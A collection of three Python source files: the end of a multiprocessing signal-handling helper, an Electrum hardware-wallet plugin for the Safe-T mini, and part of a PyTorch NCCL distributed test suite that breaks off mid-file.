def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
msg = '{0} received a '.format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += 'SIGINT'
elif signum == signal.SIGTERM:
msg += 'SIGTERM'
msg += '. Exiting'
log.debug(msg)
exit(0)
def start(self):
with default_signals(signal.SIGINT, signal.SIGTERM):
super(SignalHandlingMultiprocessingProcess, self).start()
@contextlib.contextmanager
def default_signals(*signals):
old_signals = {}
for signum in signals:
old_signals[signum] = signal.getsignal(signum)
signal.signal(signum, signal.SIG_DFL)
# Do whatever is needed with the reset signals
yield
# Restore signals
for signum in old_signals:
signal.signal(signum, old_signals[signum])
del old_signals
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bip32 import BIP32Node
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device
from electrum.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum.keystore import Hardware_KeyStore
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
from .client import SafeTClient
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
plugin: 'SafeTPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='Safe-T mini',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True) -> Optional['SafeTClient']:
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_safet_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'SafeTKeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_safet_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype._extend_address_n(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'SafeTKeyStore'):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for out in tx.outputs():
o = t._add_bin_outputs()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
test_c10d_nccl.py
|
import copy
import math
import os
import random
import signal
import sys
import tempfile
import threading
import time
from contextlib import contextmanager
from datetime import timedelta
from itertools import product
from unittest import mock
import torch
import torch.distributed as c10d
if not c10d.is_available():
print("c10d not available, skipping tests", file=sys.stderr)
sys.exit(0)
import test_c10d_common
import torch.distributed as dist
import torch.distributed.algorithms.ddp_comm_hooks.default_hooks as default
import torch.distributed.algorithms.ddp_comm_hooks.powerSGD_hook as powerSGD
import torch.nn.functional as F
import torch.testing._internal.common_utils as common
from test_c10d_common import gpus_for_rank, DoubleGpuNet, ConvNet, ModuleForDdpCommHook
from torch import nn
from torch.nn.parallel import DistributedDataParallel
from torch.testing._internal.common_distributed import (
MultiProcessTestCase,
requires_nccl,
requires_nccl_version,
skip_if_lt_x_gpu,
get_timeout,
skip_if_rocm,
with_dist_debug_levels,
with_nccl_blocking_wait,
)
from torch.testing._internal.common_utils import (
IS_WINDOWS,
TestCase,
run_tests,
retry_on_connect_failures,
TEST_WITH_ASAN,
TEST_WITH_TSAN,
sandcastle_skip,
sandcastle_skip_if,
)
from torch.utils.checkpoint import checkpoint
if not IS_WINDOWS:
from torch.distributed.optim.functional_sgd import _FunctionalSGD
from torch.distributed.optim.functional_adam import _FunctionalAdam
_SUPPORTED_OPTIM_MAPPING = {
_FunctionalSGD: torch.optim.SGD,
_FunctionalAdam: torch.optim.Adam
}
if TEST_WITH_TSAN:
print(
"Skip as TSAN is not fork-safe since we're forking in a multi-threaded environment",
file=sys.stderr,
)
sys.exit(0)
if TEST_WITH_ASAN:
print(
"Skip ASAN as torch + multiprocessing spawn have known issues", file=sys.stderr
)
sys.exit(0)
class RendezvousEnvTest(TestCase):
@retry_on_connect_failures
@requires_nccl()
@sandcastle_skip_if(
torch.cuda.device_count() == 0, "No GPUs available, skipping test"
)
def test_common_errors(self):
vars = {
"WORLD_SIZE": "1",
"RANK": "0",
"MASTER_ADDR": "127.0.0.1",
"MASTER_PORT": str(common.find_free_port()),
}
class Env(object):
def __init__(self, vars):
self.env_patcher = mock.patch.dict(os.environ, vars, clear=True)
def __enter__(self):
self.env_patcher.start()
def __exit__(self, type, value, traceback):
self.env_patcher.stop()
def without(d, key):
d = d.copy()
d.pop(key)
return d
def withouts(d, keys):
d = d.copy()
for key in keys:
d.pop(key)
return d
with Env(without(vars, "WORLD_SIZE")):
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
with self.assertRaisesRegex(ValueError, "WORLD_SIZE expected"):
gen = c10d.rendezvous("env://")
next(gen)
c10d.init_process_group(backend="nccl", world_size=1)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(without(vars, "RANK")):
self.assertEqual(None, os.environ.get("RANK"))
with self.assertRaisesRegex(ValueError, "RANK expected"):
gen = c10d.rendezvous("env://")
next(gen)
c10d.init_process_group(backend="nccl", rank=0)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(withouts(vars, ["RANK", "WORLD_SIZE"])):
self.assertEqual(None, os.environ.get("RANK"))
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
c10d.init_process_group(backend="nccl", rank=0, world_size=1)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(vars):
c10d.init_process_group(backend="nccl")
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(without(vars, "MASTER_ADDR")):
self.assertEqual(None, os.environ.get("MASTER_ADDR"))
with self.assertRaisesRegex(ValueError, "MASTER_ADDR expected"):
gen = c10d.rendezvous("env://")
next(gen)
with Env(without(vars, "MASTER_PORT")):
self.assertEqual(None, os.environ.get("MASTER_PORT"))
with self.assertRaisesRegex(ValueError, "MASTER_PORT expected"):
gen = c10d.rendezvous("env://")
next(gen)
with Env(without(vars, "WORLD_SIZE")):
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
gen = c10d.rendezvous("env://?world_size={}".format(1))
_, _, size = next(gen)
self.assertEqual(size, 1)
with Env(without(vars, "RANK")):
self.assertEqual(None, os.environ.get("RANK"))
gen = c10d.rendezvous("env://?rank={}".format(0))
_, rank, _ = next(gen)
self.assertEqual(rank, 0)
with Env(withouts(vars, ["RANK", "WORLD_SIZE"])):
self.assertEqual(None, os.environ.get("RANK"))
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
gen = c10d.rendezvous("env://?rank={}&world_size={}".format(0, 1))
_, rank, size = next(gen)
self.assertEqual(rank, 0)
self.assertEqual(size, 1)
class TimeoutTest(test_c10d_common.AbstractTimeoutTest, TestCase):
@requires_nccl()
@retry_on_connect_failures
@sandcastle_skip_if(
torch.cuda.device_count() == 0, "No GPUs available, skipping test"
)
def test_default_store_timeout_nccl(self):
self._test_default_store_timeout("nccl")
class ProcessGroupNCCLNoGPUTest(TestCase):
MAIN_PROCESS_RANK = 0
def setUp(self):
self.rank = self.MAIN_PROCESS_RANK
self.world_size = 1
self.file = tempfile.NamedTemporaryFile(delete=False)
def tearDown(self):
pass
@requires_nccl()
@sandcastle_skip_if(
torch.cuda.device_count() > 0, "GPUs are available, skipping test"
)
def test_init_no_gpus(self):
store = c10d.FileStore(self.file.name, self.world_size)
with self.assertRaisesRegex(
RuntimeError, "ProcessGroupNCCL is only supported with GPUs, no GPUs found!"
):
c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class ProcessGroupNCCLTest(TestCase):
MAIN_PROCESS_RANK = 0
def setUp(self):
self.rank = self.MAIN_PROCESS_RANK
self.world_size = 1
self.file = tempfile.NamedTemporaryFile(delete=False)
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self.num_gpus = torch.cuda.device_count()
def tearDown(self):
pass
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_empty_tensors(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
xs = [torch.cuda.FloatTensor([])]
pg.broadcast(xs).wait()
self.assertEqual(0, xs[0].numel())
pg.allreduce(xs).wait()
self.assertEqual(0, xs[0].numel())
pg.reduce(xs).wait()
self.assertEqual(0, xs[0].numel())
ys = [[torch.cuda.FloatTensor([]) for _ in range(self.world_size)]]
pg.allgather(ys, xs).wait()
for y in ys[0]:
self.assertEqual(0, y.numel())
ys = [torch.cuda.FloatTensor([])]
xs = [[torch.cuda.FloatTensor([]) for _ in range(self.world_size)]]
pg.reduce_scatter(ys, xs).wait()
self.assertEqual(0, ys[0].numel())
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_broadcast_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def broadcast(xs, rootRank, rootTensor):
opts = c10d.BroadcastOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
work = pg.broadcast(xs, opts)
work.wait()
# for every root tensor
for rt in range(self.num_gpus):
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i]).cuda(i))
broadcast(tensors, self.rank, rt)
for i in range(self.num_gpus):
self.assertEqual(tensors[i], tensors[rt])
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allreduce_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce(tensors, op):
opts = c10d.AllreduceOptions()
opts.reduceOp = op
work = pg.allreduce(tensors, opts)
work.wait()
# Sum
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.SUM)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(self.num_gpus * (self.num_gpus + 1) / 2)]),
tensors[i],
)
# Product
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.PRODUCT)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(math.factorial(self.num_gpus))]), tensors[i]
)
# Min
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.MIN)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(torch.tensor([1.0]), tensors[i])
# Max
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.MAX)
for i in range(self.num_gpus):
self.assertEqual(torch.tensor([self.num_gpus]), tensors[i])
for op in (c10d.ReduceOp.BAND, c10d.ReduceOp.BOR, c10d.ReduceOp.BXOR):
with self.assertRaisesRegex(
RuntimeError, "Cannot use " + str(op) + " with NCCL"
):
allreduce(tensors, op)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce(xs, rootRank, rootTensor, op=None):
opts = c10d.ReduceOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
if op:
opts.reduceOp = op
work = pg.reduce(xs, opts)
work.wait()
# for every root tensor
for rt in range(self.num_gpus):
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
reduce(tensors, self.rank, rt)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(self.num_gpus * (self.num_gpus + 1) / 2)]),
tensors[rt],
)
for op in (c10d.ReduceOp.BAND, c10d.ReduceOp.BOR, c10d.ReduceOp.BXOR):
with self.assertRaisesRegex(
RuntimeError, "Cannot use " + str(op) + " with NCCL"
):
reduce(tensors, self.rank, rt, op)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allgather_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather(output_ts, input_ts):
work = pg.allgather(output_ts, input_ts)
work.wait()
tensors = []
output_ts = [[] for _ in range(self.num_gpus)]
for idx, ls in enumerate(output_ts):
for _ in range(self.world_size * self.num_gpus):
ls.append(torch.tensor([0]).cuda(idx))
for i in range(self.num_gpus):
tensors.append(torch.tensor([i]).cuda(i))
allgather(output_ts, tensors)
# Verification
for device_ts in output_ts:
for s_idx, t in enumerate(device_ts):
self.assertEqual(torch.tensor([s_idx]), t)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allgather_base_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather_base(output_t, input_t):
work = pg._allgather_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# allgather_base is GPU number agnostic.
# Each rank contribute one tensor regardless of GPU counts
tensor = torch.tensor([self.rank]).cuda(device_id)
output_t = torch.empty((self.world_size), dtype=tensor.dtype).cuda(device_id)
allgather_base(output_t, tensor)
# Verification
self.assertEqual(torch.arange(self.world_size), output_t)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allgather_base_basics(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather_base(output_t, input_t):
work = pg._allgather_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# anticpate an error
with self.assertRaisesRegex(
RuntimeError,
"output tensor size must be equal to world_size times input tensor size",
):
tensor = torch.tensor([self.rank]).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=tensor.dtype).cuda(
device_id
)
# fails the check because output_t is not correctly sized
allgather_base(output_t, tensor)
# anticpate an error
with self.assertRaisesRegex(
RuntimeError, "output tensor must have the same type as input tensor"
):
tensor = torch.tensor([self.rank], dtype=torch.float).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=torch.long).cuda(
device_id
)
# fails the check because the dtype is different
allgather_base(output_t, tensor)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_scatter_base_basics(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter_base(output_t, input_t):
work = pg._reduce_scatter_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# anticpate an error
with self.assertRaisesRegex(
RuntimeError,
"input tensor must be the same size as output size times world size",
):
input_t = torch.tensor([self.rank]).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=input_t.dtype).cuda(
device_id
)
# fails the check because output_t is not correctly sized
reduce_scatter_base(output_t, input_t)
# anticpate an error
with self.assertRaisesRegex(
RuntimeError, "input tensor must be the same type as the outut tensor."
):
tensor = torch.tensor([self.rank], dtype=torch.float).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=torch.long).cuda(
device_id
)
# fails the check because the dtype is different
reduce_scatter_base(output_t, tensor)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_scatter_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter(outputs, input_lists, op):
opts = c10d.ReduceScatterOptions()
opts.reduceOp = op
work = pg.reduce_scatter(outputs, input_lists, opts)
work.wait()
virtual_rank = self.rank * self.world_size
virtual_world_size = self.num_gpus * self.world_size
output = [torch.tensor([0]).cuda(i) for i in range(self.num_gpus)]
# 0 1 2
# 0 [0..11] [1..12]
# 1 [3..14]
# 2
# 3
# Sum
tensor_lists = [
[
torch.tensor([self.rank * self.num_gpus + i + j]).cuda(i)
for j in range(virtual_world_size)
]
for i in range(self.num_gpus)
]
reduce_scatter(output, tensor_lists, c10d.ReduceOp.SUM)
for i in range(self.num_gpus):
expected = torch.tensor(
[
float(self.num_gpus * (self.num_gpus - 1) / 2)
+ (virtual_rank + i) * virtual_world_size
]
)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected, output[i])
# Min
reduce_scatter(output, tensor_lists, c10d.ReduceOp.MIN)
for i in range(self.num_gpus):
expected = torch.tensor([self.rank * self.world_size + i])
self.assertEqual(expected, output[i])
# Max
reduce_scatter(output, tensor_lists, c10d.ReduceOp.MAX)
for i in range(self.num_gpus):
expected = torch.tensor(
[self.rank * self.world_size + i + virtual_world_size - 1]
)
self.assertEqual(expected, output[i])
# Product
tensor_lists = [
[
torch.tensor(
[(self.rank * self.num_gpus + i + j) % virtual_world_size + 1]
).cuda(i)
for j in range(virtual_world_size)
]
for i in range(self.num_gpus)
]
reduce_scatter(output, tensor_lists, c10d.ReduceOp.PRODUCT)
for i in range(self.num_gpus):
expected = torch.tensor([float(math.factorial(virtual_world_size))])
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected, output[i])
@requires_nccl()
